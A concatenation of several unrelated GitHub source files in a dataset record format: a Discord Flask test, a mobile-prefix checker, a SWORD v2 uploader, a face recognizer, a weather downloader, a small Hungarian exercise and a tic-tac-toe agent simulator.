app.app_context():\n app.discord = SimpleNamespace()\n app.discord.authorized = True\n app.discord.user_id = user_full.id\n app.discord.users_cache = {user_full.id: user_full}\n\n mocker.patch('flask.current_app', return_value=app)\n\n mocker.patch.object(User, 'get_from_cache', return_value=user_full)\n mocker.patch.object(User, 'fetch_from_api', return_value=user_full)\n mocker.patch.object(DiscordModelsBase, 'fetch_from_api', return_value=[user_connection])\n\n with app.test_client() as client:\n response = client.get('/me/connections/')\n assert response.status_code == 200\n assert response.json['user_name'] == user_full.name\n assert response.json['connections'] == [f\"{user_connection.name} - {user_connection.type}\"]","repo_name":"RomanGrankin1/-Flask-Discord","sub_path":"tests/integration/test_get_user_info.py","file_name":"test_get_user_info.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12528103009","text":"smart = ['13','14','20','21','28','29','30']\ntnt = ['08','09','10','11','12','18','19']\nsun = ['22','23','32','33']\nglobe = ['15','16','17','25','26','27']\ntm = ['03','04','05','06','07']\nred = ['01','02','24']\n\n\n\nnum=input(\"Enter the number: \")\n\nwhile num[:2] != \"09\" or len(num) > 11 or len(num) < 11 or num.isdigit() is False or num.isspace() is True:\n num = input(\"Mobile number must start with '09'\\nMobile number must ONLY contain 11-digits\\n>>Enter the number: \")\n\nif num[2:4] is smart:\n 
print(str(num)+\"\\tSMART\")\nif num[2:4] in tnt:\n print(str(num)+\"\\tTNT\")\nif num[2:4] in sun:\n print(str(num)+\"\\tSUN\")\nif num[2:4] in globe:\n print(str(num)+\"\\tGLOBE\")\nif num[2:4] in tm:\n print(str(num)+\"\\tTM\")\nif num[2:4] in red:\n print(str(num)+\"\\tRED\")\n","repo_name":"ExtraRixe/Prometheus","sub_path":"Python/IT5 Activties/Act2.6.py","file_name":"Act2.6.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41457936500","text":"#!/usr/bin/env python3\n\"\"\"\nRetrieve and disseminate files and metadata to a server using SWORD v2\n\"\"\"\n\nimport logging\nimport sys\nimport sword2\nfrom errors import DisseminationError\nfrom uploader import Uploader\n\n\nclass SwordV2Uploader(Uploader):\n \"\"\"Dissemination logic for SWORD v2\"\"\"\n # using UCamApollo DSpace 7 as hard-coded logic for now.\n\n def upload_to_platform(self):\n \"\"\"Upload work in required format to SWORD v2\"\"\"\n\n # Fast-fail if credentials for upload are missing\n try:\n user_name = self.get_credential_from_env(\n 'cam_ds7_user', 'SWORD v2')\n user_pass = self.get_credential_from_env('cam_ds7_pw', 'SWORD v2')\n except DisseminationError as error:\n logging.error(error)\n sys.exit(1)\n\n # Metadata file format TBD: use CSV for now\n metadata_bytes = self.get_formatted_metadata('csv::thoth')\n # Can't continue if no PDF file is present\n try:\n pdf_bytes = self.get_publication_bytes('PDF')\n except DisseminationError as error:\n logging.error(error)\n sys.exit(1)\n\n # Convert Thoth work metadata into SWORD v2 format\n sword_metadata = self.parse_metadata()\n\n # Set up SWORD v2 endpoint connection\n conn = sword2.Connection(\n service_document_iri=\"https://dspace7-back.lib.cam.ac.uk/server/swordv2/collection/1810/339712\",\n user_name=user_name,\n user_pass=user_pass,\n # SWORD2 library doesn't handle timeout-related errors gracefully and large files\n # (e.g. 50MB) can't be fully uploaded within the 30-second default timeout.\n # Allow lots of leeway. (This otherwise matches the default `http_impl`.)\n http_impl=sword2.http_layer.HttpLib2Layer(timeout=120.0)\n )\n\n try:\n receipt = conn.create(\n col_iri=\"https://dspace7-back.lib.cam.ac.uk/server/swordv2/collection/1810/339712\",\n # Hacky workaround for an issue with mishandling of encodings within sword2 library,\n # which meant metadata containing special characters could not be submitted.\n # Although the `metadata_entry` parameter ought to be of type `Entry`, sending a\n # `str` as below triggers no errors. Ultimately it's passed to `http/client.py/_encode()`,\n # which defaults to encoding it as 'latin-1'. 
Pre-emptively encoding/decoding it here\n # seems to mean that the string sent to the server is in correct utf-8 format.\n metadata_entry=str(sword_metadata).encode(\n 'utf-8').decode('latin-1'),\n in_progress=True,\n )\n except sword2.exceptions.Forbidden:\n logging.error(\n 'Could not connect to SWORD v2 server: authorisation failed')\n sys.exit(1)\n\n if receipt.code != 201:\n logging.error(\n 'Error uploading item data to SWORD v2')\n sys.exit(1)\n\n try:\n pdf_receipt = conn.add_file_to_resource(\n edit_media_iri=receipt.edit_media,\n payload=pdf_bytes,\n # Filename TBD: use work ID for now\n filename='{}.pdf'.format(self.work_id),\n mimetype='application/pdf',\n in_progress=True,\n )\n except sword2.exceptions.Forbidden:\n logging.error(\n 'Could not connect to SWORD v2 server: authorisation failed')\n sys.exit(1)\n\n if pdf_receipt.code != 201:\n logging.error(\n 'Error uploading PDF file to SWORD v2')\n sys.exit(1)\n\n try:\n metadata_receipt = conn.add_file_to_resource(\n edit_media_iri=receipt.edit_media,\n payload=metadata_bytes,\n # Filename TBD: use work ID for now\n filename='{}.csv'.format(self.work_id),\n mimetype='text/csv',\n in_progress=True,\n )\n except sword2.exceptions.Forbidden:\n logging.error(\n 'Could not connect to SWORD v2 server: authorisation failed')\n sys.exit(1)\n\n if metadata_receipt.code != 201:\n logging.error(\n 'Error uploading metadata file to SWORD v2')\n sys.exit(1)\n\n logging.info(\n 'Successfully uploaded to SWORD v2 at {}'.format(receipt.location))\n\n def parse_metadata(self):\n \"\"\"Convert work metadata into SWORD v2 format\"\"\"\n work_metadata = self.metadata.get('data').get('work')\n sword_metadata = sword2.Entry(\n # All fields are non-mandatory and any None values are ignored on ingest\n # (within Apollo DSpace 7 - yet to test other SWORD2-based platforms)\n # Some of the below fields do not appear to be stored/\n # correctly displayed by Apollo, although they are valid within SWORD2\n title=work_metadata.get('fullTitle'),\n dcterms_publisher=self.get_publisher_name(),\n dcterms_issued=work_metadata.get('publicationDate'),\n dcterms_description=work_metadata.get('longAbstract'),\n dcterms_identifier=work_metadata.get('doi'),\n dcterms_license=work_metadata.get('license'),\n dcterms_tableOfContents=work_metadata.get('toc'),\n )\n # Workaround for adding repeatable fields\n for contributor in [n.get('fullName') for n in work_metadata.get('contributions') if n.get('mainContribution') == True]:\n sword_metadata.add_field(\"dcterms_contributor\", contributor)\n for subject in [n.get('subjectCode') for n in work_metadata.get('subjects')]:\n sword_metadata.add_field(\"dcterms_subject\", subject)\n for isbn in [n.get('isbn').replace(\n '-', '') for n in work_metadata.get('publications') if n.get('isbn') is not None]:\n sword_metadata.add_field(\"dcterms_identifier\", isbn)\n for language in [n.get('languageCode') for n in work_metadata.get('languages')]:\n sword_metadata.add_field(\"dcterms_language\", language)\n\n return sword_metadata\n","repo_name":"thoth-pub/thoth-dissemination","sub_path":"swordv2uploader.py","file_name":"swordv2uploader.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"27776951740","text":"import cv2\nimport pickle \nimport numpy as np\n\ncascade = cv2.CascadeClassifier(\"haarcascade_frontalface_alt2.xml\")\nface_recognizer = cv2.face.LBPHFaceRecognizer_create()\nface_recognizer.read(\"training.yml\")\nlabel_id = 
pickle.load(open(\"labels.pickle\", \"rb\"))\nlabel_id = {v: k for k,v in label_id.items()}\n\ndef detect_faces(cascade, image, scaleFactor = 1.2):\n\t# Making a copy of image\n\timage_copy = image.copy() \n\t\n\t# Converting to gray image\n\tgray = cv2.cvtColor(image_copy, cv2.COLOR_BGR2GRAY) \n\n\t# Detect faces using OpenCV Cascades\n\tfaces = cascade.detectMultiScale(gray, scaleFactor=scaleFactor, minNeighbors=5); \n\n\t# Plotting rectangle over faces\n\tfor (x, y, w, h) in faces:\n\t\tcv2.rectangle(image_copy, (x, y), (x+w, y+h), (0, 255, 0), 2) \n\n\tif len(faces) > 0:\n\t\treturn image_copy, gray[y:y+h, x:x+w]\n\telse:\n\t\treturn image_copy, None\n\ndef draw_text(img, text, x=400, y=300):\n cv2.putText(img, text, (x, y), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 255, 0), 2)\n\n#video = cv2.VideoCapture(0)\nurl = \"http://192.168.42.129:8080/shot.jpg\"\nimport requests\n\nwhile True:\n\timgResp=requests.get(url)\n\timgNp=np.array(bytearray(imgResp.content),dtype=np.uint8)\n\tframe=cv2.imdecode(imgNp,-1)\n\n\t#ret, frame = video.read()\n\tface_detected, roi = detect_faces(cascade, frame)\n\tif roi is not None:\n\t\tid_, conf = face_recognizer.predict(roi)\n\t\tprint(label_id[id_], conf)\n\t\tdraw_text(face_detected, label_id[id_])\n\tcv2.imshow('face', face_detected)\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak \n#video.release()\ncv2.destroyAllWindows()\n","repo_name":"ni3-k/Game-of-Thrones-Recognizer","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24845717828","text":"import logging\nfrom logging_config import configure_logger\nimport time\nfrom datetime import datetime\nimport json\nfrom urllib.parse import urlencode\nimport httpx\nfrom pathlib import Path\n\nfrom download_common import (\n save_to_pq,\n save_to_db,\n initial_report,\n final_report,\n SERVERS,\n API_KEY,\n)\nfrom download_async import download_many as download_readings_async\nfrom download_concur import download_many as download_readings_concur\nfrom download_seq import download_many as download_readings_seq\nfrom validate_reading import validate_reading\n\nconfigure_logger()\n\nPROJECT_DIR_PATH = Path(__file__).resolve().parents[1]\nCITIES_CONFIG_PATH = PROJECT_DIR_PATH / \"weather_reader\" / \"cities.json\"\n\n\ndef update_city_lat_lon() -> dict:\n \"\"\"\n Update or retrieve latitude and longitude coordinates for a list of cities from a JSON file.\n\n This function checks if the latitude and longitude coordinates of the cities in the JSON file are up to date.\n If not, it updates the coordinates and writes them back to the file.\n\n Returns:\n dict: A dictionary containing city information with updated 'lat' and 'lon' coordinates.\n \"\"\"\n try:\n with open(CITIES_CONFIG_PATH, \"r\") as file:\n data = json.load(file)\n cities = data.get(\"cities\", {})\n city_lat_lon = data.get(\"city_lat_lon\", {})\n cached_city_lat_lon = data.get(\"cached_city_lat_lon\", {})\n\n cities_key_set = set(cities.keys())\n if (cities_key_set != set(city_lat_lon.keys())) and cities_key_set.issubset(\n set(cached_city_lat_lon.keys())\n ):\n logging.info(\n \"Attempting to update city latitude and longitude coordinates from cache.\"\n )\n logging.info(f\"Starting update at: {datetime.now()}\")\n keys_to_update = cities_key_set - set(city_lat_lon.keys())\n for key in keys_to_update:\n city_lat_lon[key] = cached_city_lat_lon[key]\n data[\"city_lat_lon\"] = city_lat_lon\n with 
open(CITIES_CONFIG_PATH, \"w\") as file:\n json.dump(data, file, indent=4)\n logging.info(f\"Finished update at: {datetime.now()}\")\n\n elif cities_key_set != set(city_lat_lon.keys()):\n logging.info(\"Updating city latitude and longitude coordinates.\")\n logging.info(f\"Starting update at: {datetime.now()}\")\n updated_city_lat_lon = get_lat_lon(cities)\n data[\"city_lat_lon\"] = updated_city_lat_lon\n with open(CITIES_CONFIG_PATH, \"w\") as file:\n json.dump(data, file, indent=4)\n logging.info(f\"Finished update at: {datetime.now()}\")\n\n\n\n return city_lat_lon\n\n except FileNotFoundError:\n logging.error(f\"Could not find the file at {CITIES_CONFIG_PATH}\")\n except KeyError as e:\n logging.error(f\"Unexpected JSON format: Missing key {e}\")\n\n\ndef get_lat_lon(cities: dict) -> dict:\n \"\"\"\n Retrieves latitude and longitude coordinates for a list of cities.\n\n Args:\n cities (dict): A dictionary containing city information, including country and state (if applicable).\n\n Returns:\n dict: A dictionary containing city information with added 'lat' and 'lon' coordinates.\n \"\"\"\n\n base_url = SERVERS[\"LATLONG\"]\n\n for city, co_st in cities.items():\n country_code = co_st[\"country\"]\n\n if country_code == \"US\":\n q_value = f\"{city},{co_st['state']},{country_code}\"\n else:\n q_value = f\"{city},{country_code}\"\n\n params = {\"q\": q_value, \"limit\": 1, \"appid\": API_KEY}\n\n url = base_url + urlencode(params)\n response = httpx.get(url)\n response.raise_for_status()\n data = response.json()\n cities[city][\"lat\"] = data[0][\"lat\"]\n cities[city][\"lon\"] = data[0][\"lon\"]\n\n return cities\n\n\ndef main(concur_type=None, max_concur_req=None):\n \"\"\"\n Main function to orchestrate the data download and processing workflow.\n\n This function retrieves latitude and longitude coordinates for a list of cities,\n downloads weather data based on the specified concurrency type, and saves the\n valid data to a Parquet file. It also generates and logs initial and final reports\n including concurrency type, max concurrency, and elapsed time.\n\n Args:\n concur_type (str, optional): The concurrency type to use for downloading data\n (e.g., 'thread', 'process', 'coroutine'). Default is None.\n max_concur_req (int, optional): The maximum number of concurrent requests to\n make during data download. 
Default is None.\n\n Returns:\n None\n \"\"\"\n\n city_lat_lon = update_city_lat_lon()\n initial_report((concur_type, max_concur_req), city_lat_lon)\n t0 = time.perf_counter()\n\n if concur_type == \"thread\":\n result = download_readings_concur(\n SERVERS[\"WEATHER\"], city_lat_lon, \"thread\", max_concur_req\n )\n elif concur_type == \"process\":\n if __name__ == \"__main__\":\n result = download_readings_concur(\n SERVERS[\"WEATHER\"], city_lat_lon, \"process\", max_concur_req\n )\n elif concur_type == \"coroutine\":\n if __name__ == \"__main__\":\n result = download_readings_async(\n SERVERS[\"WEATHER\"], city_lat_lon, max_concur_req=len(city_lat_lon)\n )\n else:\n if __name__ == \"__main__\":\n result = download_readings_seq(SERVERS[\"WEATHER\"], city_lat_lon)\n\n df = result[0]\n counter = result[1]\n valid_readings_batch = validate_reading(df)\n save_to_pq(valid_readings_batch)\n save_to_db(valid_readings_batch)\n\n final_report(counter, t0)\n\n return df\n\n\nif __name__ == \"__main__\":\n print(main(concur_type='coroutine'))\n","repo_name":"codeslp/weather_reader","sub_path":"weather_reader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32605001304","text":"class telek:\n paros=False\n szelesseg=0\n kerites=\"\"\n def __init__(self,sor):\n #sor (input line): 1 8 K \n vag=sor.replace(\"\\n\",\"\").split(\" \")\n if vag[0]==\"1\":\n self.paros=False\n else:\n self.paros=True\n\n\ntelkek=[]\nf=open(\"kerites.txt\")\ndb=[]\nfor sor in f:\n telkek.append(telek(sor))\n\nf.close()\n#t=telek(\"1 8 K\")\nprint(\"Task 2\")\nprint(\"The number of plots sold is {}\".format(len(telkek)))\nprint(\"Task 3\")\nif telkek[-1].paros:\n print(\"It was sold on the even side.\")\nelse:\n print(\"It was sold on the odd side.\")\n","repo_name":"Feenc/sulishtml","sub_path":"python/kerites.py","file_name":"kerites.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37408488509","text":"'''\r\nTic Tac Toe With Agents\r\n\r\nPlayer Agents:\r\n- NoRulesAgent: Randomizes turn taking, position, and player without regard for the rules of the game. Great at parties.\r\n- RandomAgent: Places randomly.\r\n- OneStepAheadAgent: Checks if it can win or lose in one move, but otherwise places randomly.\r\n- MinimaxAgent: Uses minimax to find the best move.\r\n\r\nSupervisor Agents:\r\n- RegularReferee: Checks if the moves are legal, and if the game is over.\r\n- NoPenaltiesReferee: Only checks to see if the game is over. Allows all moves.\r\n\r\nNote that code is not shared between agents to make the complexity of each agent clearer.\r\n\r\nUsage:\r\npython tic-tac-toe.py [debug]\r\n'''\r\nfrom enum import Enum\r\nimport random\r\nimport sys\r\n\r\n# TODO These should be in separate enums that distinguish between the player and the board state. 
(But if Gato can get away with mixing modalities, so can I.)\r\nX = 0\r\nO = 1\r\nEMPTY = 2\r\nREFEREE = 3\r\n\r\n# For player integer to string\r\nplayermap = {X: \"X\", O: \"O\", REFEREE: \"R\"}\r\n\r\ndef log(player: int, s: str) -> None:\r\n if len(sys.argv) > 1 and sys.argv[1] == \"debug\":\r\n print(f\"{playermap[player]}: {s}\", flush=True)\r\n\r\nclass Coordinate:\r\n def __init__(self, row: int, col: int):\r\n self.row = row\r\n self.col = col\r\n\r\n def __str__(self):\r\n return f\"({self.row}, {self.col})\"\r\n \r\n def __repr__(self):\r\n return str(self)\r\n\r\nclass Board:\r\n def __init__(self):\r\n self.board = [[EMPTY for _ in range(3)] for _ in range(3)]\r\n\r\n def place(self, coordinate: Coordinate, player: int) -> None:\r\n self.board[coordinate.row][coordinate.col] = player\r\n\r\n def pretty_print(self) -> None:\r\n for row in self.board:\r\n for col in row:\r\n if col == X:\r\n print(\"X\", end=\"\")\r\n elif col == O:\r\n print(\"O\", end=\"\")\r\n else:\r\n print(\"-\", end=\"\")\r\n print()\r\n\r\n def __hash__(self):\r\n return hash(tuple(tuple(row) for row in self.board))\r\n\r\n def iter(self):\r\n for row in self.board:\r\n for col in row:\r\n yield col\r\n \r\n def __getitem__(self, key):\r\n return self.board[key]\r\n \r\n def copy(self):\r\n new_board = Board()\r\n for row in range(3):\r\n for col in range(3):\r\n new_board.board[row][col] = self.board[row][col]\r\n return new_board\r\n\r\nclass Move:\r\n def __init__(self, coordinate: Coordinate, player: int):\r\n self.coordinate = coordinate\r\n self.player = player\r\n\r\n def __str__(self):\r\n return f\"{self.coordinate} {self.player}\"\r\n\r\nclass Agent:\r\n pass\r\n\r\nclass NoRulesAgent(Agent):\r\n def __init__(self, player: int):\r\n self.player = player\r\n pass\r\n\r\n def step(self, board: Board) -> Move:\r\n turn = random.choice([True, False])\r\n\r\n if not turn:\r\n log(self.player, \"Not taking a turn.\")\r\n return None\r\n\r\n row = random.choice([0, 1, 2])\r\n col = random.choice([0, 1, 2])\r\n player = random.choice([X, O])\r\n log(self.player, f\"Placing at ({row}, {col}) as {playermap[player]}\")\r\n\r\n return Move(Coordinate(row, col), player)\r\n\r\nclass RandomAgent(Agent):\r\n def __init__(self, player: int):\r\n self.player = player\r\n\r\n def step(self, board: Board) -> Move:\r\n hist = self.board_histogram(board)\r\n \r\n winner = self.check_win(board)\r\n \r\n if winner == self.player:\r\n log(self.player, \"I won!\")\r\n return None\r\n \r\n if winner != EMPTY:\r\n log(self.player, \"I lost!\")\r\n return None\r\n\r\n if hist[EMPTY] == 0:\r\n log(self.player, \"Draw!\")\r\n return None\r\n\r\n if (hist[O] >= hist[X]) and self.player == O:\r\n log(self.player, \"Not my turn, X is next.\")\r\n return None\r\n \r\n if (hist[X] > hist[O]) and self.player == X:\r\n log(self.player, \"Not my turn, O is next.\")\r\n return None\r\n \r\n random_free_spot = random.choice(self.free_spots(board))\r\n log(self.player, f\"Placing at {random_free_spot}\")\r\n\r\n return Move(random_free_spot, self.player)\r\n\r\n def board_histogram(self, board: Board) -> dict:\r\n hist = {X: 0, O: 0, EMPTY: 0}\r\n for pos in board.iter():\r\n hist[pos] += 1\r\n return hist\r\n\r\n def free_spots(self, board: Board) -> [Coordinate]:\r\n free = []\r\n for row in range(3):\r\n for col in range(3):\r\n if board[row][col] == EMPTY:\r\n free.append(Coordinate(row, col))\r\n return free\r\n \r\n def check_win(self, board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] 
== board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n \r\nclass OneStepAheadAgent(Agent):\r\n def __init__(self, player: int):\r\n self.player = player\r\n\r\n def step(self, board: Board) -> Move:\r\n hist = self.board_histogram(board)\r\n \r\n winner = self.check_win(board)\r\n \r\n if winner == self.player:\r\n log(self.player, \"I won!\")\r\n return None\r\n \r\n if winner != EMPTY:\r\n log(self.player, \"I lost!\")\r\n return None\r\n\r\n if hist[EMPTY] == 0:\r\n log(self.player, \"Draw!\")\r\n return None\r\n\r\n if (hist[O] >= hist[X]) and self.player == O:\r\n log(self.player, \"Not my turn, X is next.\")\r\n return None\r\n \r\n if (hist[X] > hist[O]) and self.player == X:\r\n log(self.player, \"Not my turn, O is next.\")\r\n return None\r\n\r\n # Imagine my own moves\r\n imagined_board = board.copy()\r\n for move in self.free_spots(board):\r\n imagined_board.place(move, self.player)\r\n if self.check_win(imagined_board) == self.player:\r\n log(self.player, f\"I can win by placing at {move}, so I'm going to place there.\")\r\n return Move(move, self.player)\r\n imagined_board.place(move, EMPTY)\r\n\r\n # Imagine the other player's move\r\n other_player = X if self.player == O else O\r\n imagined_board = board.copy()\r\n for move in self.free_spots(board):\r\n imagined_board.place(move, other_player)\r\n if self.check_win(imagined_board) == other_player:\r\n log(self.player, f\"Other player can win by placing at {move}, so I'm going to place there.\")\r\n return Move(move, self.player)\r\n imagined_board.place(move, EMPTY)\r\n\r\n # Otherwise, place randomly\r\n random_free_spot = random.choice(self.free_spots(board))\r\n log(self.player, f\"Randomly placing at {random_free_spot}\")\r\n\r\n return Move(random_free_spot, self.player)\r\n\r\n def board_histogram(self, board: Board) -> dict:\r\n hist = {X: 0, O: 0, EMPTY: 0}\r\n for pos in board.iter():\r\n hist[pos] += 1\r\n return hist\r\n\r\n def free_spots(self, board: Board) -> [Coordinate]:\r\n free = []\r\n for row in range(3):\r\n for col in range(3):\r\n if board[row][col] == EMPTY:\r\n free.append(Coordinate(row, col))\r\n return free\r\n \r\n def check_win(self, board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] == board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n\r\nclass MinimaxAgent(Agent):\r\n def __init__(self, player: int):\r\n self.player = player\r\n\r\n def step(self, board: Board) -> Move:\r\n hist = self.board_histogram(board)\r\n \r\n winner = self.check_win(board)\r\n \r\n if winner == self.player:\r\n log(self.player, \"I won!\")\r\n return None\r\n \r\n if winner != EMPTY:\r\n log(self.player, \"I lost!\")\r\n return None\r\n\r\n if hist[EMPTY] == 0:\r\n log(self.player, \"Draw!\")\r\n return None\r\n\r\n if (hist[O] >= hist[X]) and self.player == O:\r\n log(self.player, \"Not my turn, X is next.\")\r\n return None\r\n \r\n if 
(hist[X] > hist[O]) and self.player == X:\r\n log(self.player, \"Not my turn, O is next.\")\r\n return None\r\n\r\n # Place at a random highest value position\r\n position_values = self.position_values(board, self.player)\r\n highest_value = max(position_values.values())\r\n highest_value_positions = list({k: v for k, v in position_values.items() if v == highest_value}.keys())\r\n random_highest_value_position = random.choice(highest_value_positions)\r\n log(self.player, f\"I'm going to place at a random highest value position: {random_highest_value_position}\")\r\n return Move(random_highest_value_position, self.player)\r\n \r\n def position_values(self, board:Board, imagined_player: int) -> dict:\r\n # Note this doesn't memoize or deduplicate, so it's very slow\r\n values = {}\r\n for move in self.free_spots(board):\r\n imagined_board = board.copy()\r\n imagined_board.place(move, imagined_player)\r\n if self.check_win(imagined_board) == imagined_player:\r\n # We would win\r\n values[move] = 1\r\n elif len(self.free_spots(imagined_board)) == 0:\r\n # We would draw\r\n values[move] = 0\r\n else:\r\n # Opponent would get to move, and could choose the best position for them\r\n values[move] = max(self.position_values(imagined_board, X if imagined_player == O else O).values()) * -1 # Their win is our loss\r\n if values[move] == 1:\r\n # Found a winning move, no need to keep searching\r\n break\r\n \r\n return values\r\n\r\n def other_player(self) -> int:\r\n return X if self.player == O else O\r\n\r\n def board_histogram(self, board: Board) -> dict:\r\n hist = {X: 0, O: 0, EMPTY: 0}\r\n for pos in board.iter():\r\n hist[pos] += 1\r\n return hist\r\n\r\n def free_spots(self, board: Board) -> [Coordinate]:\r\n free = []\r\n for row in range(3):\r\n for col in range(3):\r\n if board[row][col] == EMPTY:\r\n free.append(Coordinate(row, col))\r\n return free\r\n \r\n def check_win(self, board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] == board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n\r\nclass Judgement(Enum):\r\n X_WINS = 0\r\n O_WINS = 1\r\n DRAW = 2\r\n X_PENALTY = 3\r\n O_PENALTY = 4\r\n\r\nclass RegularReferee:\r\n def __init__(self):\r\n pass\r\n\r\n def step(self, board: Board, x_move: Move, o_move: Move) -> Judgement:\r\n if x_move is not None and x_move.player != X:\r\n log(REFEREE, \"X didn't put down the correct symbol. Penalty X.\")\r\n return Judgement.X_PENALTY\r\n \r\n if o_move is not None and o_move.player != O:\r\n log(REFEREE, \"O didn't put down the correct symbol. Penalty O.\")\r\n return Judgement.O_PENALTY\r\n\r\n if x_move is not None and board[x_move.coordinate.row][x_move.coordinate.col] != EMPTY:\r\n log(REFEREE, \"X moved on top of another piece. Penalty X.\")\r\n return Judgement.X_PENALTY\r\n\r\n if o_move is not None and board[o_move.coordinate.row][o_move.coordinate.col] != EMPTY:\r\n log(REFEREE, \"O moved on top of another piece. Penalty O.\")\r\n return Judgement.O_PENALTY\r\n\r\n if x_move is not None and self.whose_turn(board) == O:\r\n log(REFEREE, \"Not X's turn. 
Penalty X.\")\r\n return Judgement.X_PENALTY\r\n\r\n if o_move is not None and self.whose_turn(board) == X:\r\n log(REFEREE, \"Not O's turn. Penalty O.\")\r\n return Judgement.O_PENALTY\r\n \r\n if self.check_win(board) == X:\r\n log(REFEREE, \"X wins!\")\r\n return Judgement.X_WINS\r\n\r\n if self.check_win(board) == O:\r\n log(REFEREE, \"O wins!\")\r\n return Judgement.O_WINS\r\n\r\n if all(pos is not EMPTY for pos in board.iter()) and self.check_win(board) == EMPTY:\r\n log(REFEREE, \"Draw!\")\r\n return Judgement.DRAW\r\n \r\n if x_move is None and self.whose_turn(board) == X:\r\n log(REFEREE, \"X's turn but didn't go. Penalty X.\")\r\n return Judgement.X_PENALTY\r\n\r\n if o_move is None and self.whose_turn(board) == O:\r\n log(REFEREE, \"O's turn but didn't go. Penalty O.\")\r\n return Judgement.O_PENALTY\r\n\r\n def whose_turn(self, board: Board) -> int:\r\n hist = self.board_histogram(board)\r\n if hist[O] >= hist[X]:\r\n return X\r\n return O\r\n \r\n def board_histogram(self, board: Board) -> dict:\r\n hist = {X: 0, O: 0, EMPTY: 0}\r\n for pos in board.iter():\r\n hist[pos] += 1\r\n return hist\r\n\r\n def check_win(self, board: Board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] == board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n \r\nclass NoPenaltiesReferee:\r\n def __init__(self):\r\n pass\r\n\r\n def step(self, board: Board, x_move: Move, o_move: Move) -> Judgement:\r\n if self.check_win(board) == X:\r\n log(REFEREE, \"X wins!\")\r\n return Judgement.X_WINS\r\n\r\n if self.check_win(board) == O:\r\n log(REFEREE, \"O wins!\")\r\n return Judgement.O_WINS\r\n\r\n if all(pos is not EMPTY for pos in board.iter()) and self.check_win(board) == EMPTY:\r\n log(REFEREE, \"Draw!\")\r\n return Judgement.DRAW\r\n\r\n def check_win(self, board: Board) -> int:\r\n # Check rows\r\n for row in range(3):\r\n if board[row][0] == board[row][1] == board[row][2]:\r\n return board[row][0]\r\n \r\n # Check columns\r\n for col in range(3):\r\n if board[0][col] == board[1][col] == board[2][col]:\r\n return board[0][col]\r\n \r\n # Check diagonals\r\n if board[0][0] == board[1][1] == board[2][2]:\r\n return board[0][0]\r\n \r\n if board[0][2] == board[1][1] == board[2][0]:\r\n return board[0][2]\r\n \r\n return EMPTY\r\n \r\nclass Simulator:\r\n def __init__(self, agent_x: Agent, agent_o: Agent, agent_referee):\r\n self.players = [agent_x, agent_o]\r\n self.referee = agent_referee\r\n self.board = Board()\r\n\r\n def step(self) -> Judgement:\r\n moves = [agent.step(self.board) for agent in self.players]\r\n \r\n judgement = self.referee.step(self.board, moves[X], moves[O])\r\n if judgement is not None:\r\n return judgement\r\n \r\n for move in moves:\r\n if move is not None:\r\n self.board.place(move.coordinate, move.player)\r\n\r\n return None\r\n \r\n def run(self) -> Judgement:\r\n while True:\r\n if len(sys.argv) > 1 and sys.argv[1] == \"debug\":\r\n print()\r\n self.board.pretty_print()\r\n print()\r\n judgement = self.step()\r\n if judgement is not None:\r\n if len(sys.argv) > 1 and sys.argv[1] == \"debug\":\r\n print()\r\n self.board.pretty_print()\r\n print()\r\n return judgement\r\n\r\ndef main():\r\n judgement_counts = {}\r\n \r\n 
